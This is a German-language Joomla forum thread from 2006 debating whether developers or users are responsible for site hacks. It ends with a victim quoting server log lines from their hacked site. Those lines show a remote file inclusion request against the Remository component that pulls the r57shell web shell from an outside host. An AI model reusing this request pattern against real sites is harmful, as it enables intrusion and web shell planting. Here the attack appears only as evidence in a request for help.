Zeig mir mal die Stelle wo im Posting von Webmasterin nur "Frust abgelassen wurde".Zitat von Papillon
Eher im Gegenteil. Viel sachlicher geht es schon fast nicht mehr.
Zeig mir mal die Stelle wo im Posting von Webmasterin nur "Frust abgelassen wurde".Zitat von Papillon
Eher im Gegenteil. Viel sachlicher geht es schon fast nicht mehr.
Richtig. Die meisten der hier in letzter Zeit aufgetauchten Hacks konnten aber nur aufgrund einer Kombination verschiedener Lücken bzw. falscher Einstellungen erfolgreich sein.Zitat von ajuch
Ein Punkt, dem ich zustimmen kann. Wurde ja auch schon in anderen threads angesprochen, dass eine Art Zertifizierungsstelle durchaus sehr hilfreich wäre, auch wenn selbst dies nicht absolute Sicherheitsgarantie geben kann.Zitat von ajuch
Dies war auch nicht im Mindesten meine Absicht. Meine Frage ("Oder irgendein neues Sicherheitsloch entdeckt?") war ernst gemeint. Leider habe ich darauf ja keine Antwort bekommen.Zitat von ajuch
Allerdings darf man schon auch nach der Verantwortung der User fragen. Nur zu fordern, die Entwickler sollen endlich mal sicher Software programmieren, ist eben etwas zu einfach. Natürlich sollen sie das, aber für einen Teil der Hacks sind die User nunmal mitverantwortlich. Man braucht sich ja nur mal die täglichen posts zu den Hacks durchzulesen.
Als dumm würde ich keinen Anwender (bin ja auch einer) hinstellen, wohl aber mitunter als fahrlässig.
Gruß Papi
Gelöste Threads bitte markieren: Anleitung | Joomla 2.5-Tutorial: Schulhomepage mit Joomla 2.5 erstellen | Winged Messenger: www.joomla-fortbildung.de
Dann haben wir eine unterschiedliche Wahrnehmung.Zitat von langsch2
![]()
Zitat von webmaster
Wenn jemand fast nur Kritik übt, und dies - in meinen Augen - wenig konstruktiv tut, so empfinde ich das als Frust ablassen.Zitat von webmaster
Um wieder etwas zum Thema zurückzukommen:
Einen guten Ansatz der Joomla-Entwickler auf die Sicherheitslöcher in den Dritt-Anbieter-Komponenten gibt es hier:
http://dev.joomla.org/component/opti...s:make_secure/
Gruß Papi
Gelöste Threads bitte markieren: Anleitung | Joomla 2.5-Tutorial: Schulhomepage mit Joomla 2.5 erstellen | Winged Messenger: www.joomla-fortbildung.de
Das kommt imer darauf an *welche* Stellen man zitiert und welche man weglässt :-)Zitat von Papillon
Zum Thema Sicherhet zurück. Mir ist in den letzten Tagen eine zugegebenermassen etwas "abstruse" Idee gekommen: Phalanger - Mono oder -.NET Kombination.
Wem das jetzt nichts sagt: http://www.heise.de/newsticker/resul...ords=Phalanger
Wäre das ein Weg den man ernsthaft in Erwägung ziehen könnte?
Ok, ich geb's zu!Zitat von langsch2
Aber schließlich hast Du mich ja auch nach einer Stelle gefragt.
![]()
Da kenne ich mich nicht mit aus. Aber wo bliebe der Open Source-Gedanke, wenn man nur noch die binaries herausgibt, oder blicke ich es gerade nicht?Zitat von langsch2
Gruß Papi
Gelöste Threads bitte markieren: Anleitung | Joomla 2.5-Tutorial: Schulhomepage mit Joomla 2.5 erstellen | Winged Messenger: www.joomla-fortbildung.de
Ich schrieb ja, "etwas abstruse Idee" :-)Zitat von Papillon
Das ganze soll angeblich auch unter "MONO" laufen. Die Sourcen kann man trotzdem rausgeben. Und Mono ist OSS. Aber wie gesagt, selbst mir erscheint die Idee im Moment noch etwas "merkwürdig....
Ein paar Ansätze sind in der 1.5 schon zu erkennen.Zitat von ajuch
Dass wir uns nicht falsch verstehen: Da gibt es von Seiten der Joomla-Entwickler sicher noch einiges zu tun. Mir geht es nur darum, dass jeder sein Bestes geben soll. Und dazu gehört auch der Entwickler von Komponenten und der Anwender. Nur zu fordern, die anderen sollen, ist mir zu einfach.
Gelöste Threads bitte markieren: Anleitung | Joomla 2.5-Tutorial: Schulhomepage mit Joomla 2.5 erstellen | Winged Messenger: www.joomla-fortbildung.de
Da hat man leider auch dem Druck der Anwender nachgegeben.Zitat von ajuch
Gelöste Threads bitte markieren: Anleitung | Joomla 2.5-Tutorial: Schulhomepage mit Joomla 2.5 erstellen | Winged Messenger: www.joomla-fortbildung.de
Dass in der letzten Zeit so viele joomla Seiten betroffen sind, kann vielleicht auch damit zu tun haben, dass eine zentrale Hack Datenbank kürzlich auf joomla umgestiegen ist.
Mir wurde mal meine 4images Galerie gehackt und ich hatte dann im Internet nach der Hackergruppe etwas recherchiert und dabei war ich auf www.zone-h.org gestoßen.
Dort scheint über alle Hackerangriffe im Internet genau Buch geführt zu werden und es werden dort stolz alle gehackten Webseiten gelistet incl. einer Hacker Top List usw.
Diese Seite läuft jetzt auf joomla (vorher wars irgendwas anderes). Die haben sogar eine eigene Komponente com_attacks entwickelt.
http://www.zone-h.org/component/opti...cks/Itemid,43/
Wenn man oben auf 'enable filters' klickt kann man nach attacker, webseite, Datum etc. etc. suchen.
Da haben die natürlich die joomla software genau unter die Lupe genommen nehme ich an ...
Nachtrag: wenn man es genau nimmt, könnte man es dann aber direkt schon als ein Kompliment werten, wenn sich die Hacker dann doch selber für joomla entscheiden ...![]()
Geändert von bluecafe (13.08.2006 um 12:01 Uhr)
morgen,
auch meine Seite wurde gehackt und ich habe folgendes aus dem ftp log auslesen können:
Könnte mir jemand eine Info dazu bitte geben?81.214.181.200 - - [12/Aug/2006:16:42:09 +0200] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rst.void****/download/r57shell.txt? HTTP/1.1" 200 36857 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
81.214.181.200 - - [12/Aug/2006:16:42:17 +0200] "POST /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rst.void****/download/r57shell.txt? HTTP/1.1" 200 8842 "http://www.****/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rst.void****/download/r57shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
81.214.181.200 - - [12/Aug/2006:16:42:27 +0200] "POST /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rst.void****/download/r57shell.txt? HTTP/1.1" 200 36757 "http://www.****/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rst.void****/download/r57shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
Grüße
killa
Lesezeichen